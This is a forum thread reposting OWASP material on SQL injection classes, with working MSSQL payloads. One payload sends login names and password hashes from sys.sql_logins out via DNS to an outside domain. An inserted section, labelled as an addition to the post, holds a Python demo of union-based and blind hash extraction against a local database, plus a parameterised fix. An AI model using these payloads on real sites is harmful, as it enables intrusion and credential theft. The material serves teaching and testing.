Author Topic: SQL injection classes and Types (USEFUL)  (Read 1041 times)

Offline MJK7290

  • NULL
  • Posts: 1
  • Cookies: -4
SQL injection classes and Types (USEFUL)
« on: February 01, 2016, 04:50:54 am »
SQL Injection can be broken up into 3 classes:

Inband - data is extracted using the same channel that is used to inject the SQL code.
This is the most straightforward kind of attack, in which the retrieved data is presented
directly in the application web page

Out-of-Band - data is retrieved using a different channel (e.g.: an email with the results of
the query is generated and sent to the tester)

Inferential - there is no actual transfer of data, but the tester is able to reconstruct the
information by sending particular requests and observing the resulting behaviour of the
website/DB Server.
--------------------------------------------------------------------------------------------------------------



INBAND:
Data is extracted using the same channel that is used to inject the SQL
code.
This is the most straightforward kind of attack, in which the retrieved data is
presented directly in the application web page
So these are our Error-Based and Union-Based SQL Injections

http://[site]/page.asp?id=1 or 1=convert(int,(USER))--

Syntax error converting the nvarchar value '[j0e]' to a column of data type int.

--------------------------------------------------------------------------------------------------------------



OUT-OF-BAND:
Data is retrieved using a different channel (e.g.: an email with the results of
the query is generated and sent to the tester).
This is another way of getting the data out of the server (such as over HTTP or DNS).

http://[site]/page.asp?id=1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.pwn3dbyj0e.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--

--------------------------------------------------------------------------------------------------------------



INFERENTIAL:
If the application returns an error message generated by an incorrect query,
then it is easy to reconstruct the logic of the original query and therefore
understand how to perform the injection correctly.
However, if the application hides the error details, then the tester must be
able to reverse engineer the logic of the original query.
The latter case is known as "Blind SQL Injection".

http://[site]/page.asp?id=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:10'--

Ask it if it's running as 'sa'


--------------------------------------------------------------------------------------------------------------


SQL Injection Types:

Error-Based SQL Injection
Union-Based SQL Injection
Blind SQL Injection

Error:
Asking the DB a question that will cause an error, and gleaning information from the
error.

Union:
The SQL UNION is used to combine the results of two or more SELECT SQL
statements into a single result. Really useful for SQL Injection :)

Blind:
Asking the DB a true/false question and using whether a valid page is returned or not, or
the time it takes for your valid page to return, as the answer to the question.







WHY FOCUS ON MANUAL TESTING INSTEAD OF TOOLS?:
- SQL Injection Scanners will generally look for 1 type of injection.....
- The scanner may tell you the site isn't vulnerable when it really is.
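
The three classes and three types above, as an added worked example that is not part of the original post or of the OWASP text it quotes. It models the page.asp?id= query from the post in Python against an in-memory SQLite database: the vulnerable concatenated query, an inband (union-based) extraction that returns the data in the same response, an inferential (boolean-based blind) extraction that only observes whether the "valid page" comes back, the error channel, and the parameterised query that closes all of them. The schema, the 'sa' login row and its hash are constructed sample data, not from the post; the post's payloads are MSSQL (convert, waitfor delay, xp_fileexist), so the time-based and out-of-band variants are not reproduced here since SQLite has no delay or file/network primitives.

```python
import sqlite3


def make_db():
    # Constructed sample schema and data (assumption, not from the post).
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE logins(name TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
        INSERT INTO logins VALUES ('sa', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def vulnerable_page(conn, id_param):
    # Stand-in for page.asp?id=...: the parameter is concatenated straight into SQL.
    # Errors are echoed back to the caller, which is the error-based channel.
    sql = "SELECT name FROM products WHERE id = " + id_param
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as e:
        return {"error": str(e), "rows": []}
    return {"error": None, "rows": [r[0] for r in rows]}


def union_extract(conn):
    # Inband / union-based: a second SELECT is glued on and its rows come back
    # in the same response as the legitimate product name.
    payload = "1 UNION SELECT name || ':' || password_hash FROM logins"
    return vulnerable_page(conn, payload)["rows"]


def blind_extract_hash(conn, length):
    # Inferential / boolean-based blind: nothing from logins is ever displayed.
    # Each request asks one true/false question ("is the char code at this
    # position greater than mid?") and the only signal is whether the normal
    # page (a product row) is returned. A bisection over printable ASCII needs
    # about seven requests per character instead of up to 95.
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # inclusive range of printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            probe = (
                "1 AND (SELECT unicode(substr(password_hash, %d, 1)) "
                "FROM logins WHERE name = 'sa') > %d" % (pos, mid)
            )
            if vulnerable_page(conn, probe)["rows"]:  # valid page => condition true
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


def safe_page(conn, id_param):
    # Hardened version: the id is validated as an integer and passed as a bound
    # parameter, so none of the payloads above reach the SQL parser as code.
    try:
        id_value = int(id_param)
    except ValueError:
        return {"error": "bad id", "rows": []}
    rows = conn.execute("SELECT name FROM products WHERE id = ?", (id_value,)).fetchall()
    return {"error": None, "rows": [r[0] for r in rows]}


if __name__ == "__main__":
    db = make_db()
    print("union  :", union_extract(db))
    print("blind  :", blind_extract_hash(db, 32))
    print("error  :", vulnerable_page(db, "1'")["error"])
    print("safe   :", safe_page(db, "1 UNION SELECT name FROM logins"))
```

The blind routine is the one to study: it recovers the full 32-character hash from a page that never displays anything but product names, which is exactly why a scanner that only checks for reflected data in the response (the inband case) can report a site as clean when it is not.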

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
Re: SQL injection classes and Types (USEFUL)
« Reply #1 on: February 01, 2016, 05:22:56 am »
Please do not post tutorials directly to the High Quality tutorials board. That is reserved for community vetted tutorials.

Offline Kurajber

  • Serf
  • *
  • Posts: 43
  • Cookies: 7
  • Don't Drink and Root
Re: SQL injection classes and Types (USEFUL)
« Reply #2 on: February 01, 2016, 10:55:17 am »
Also when you copy-paste something like this, you post it in "Found it on the Webs" topic, not Tutorials.

Link: https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)#Summary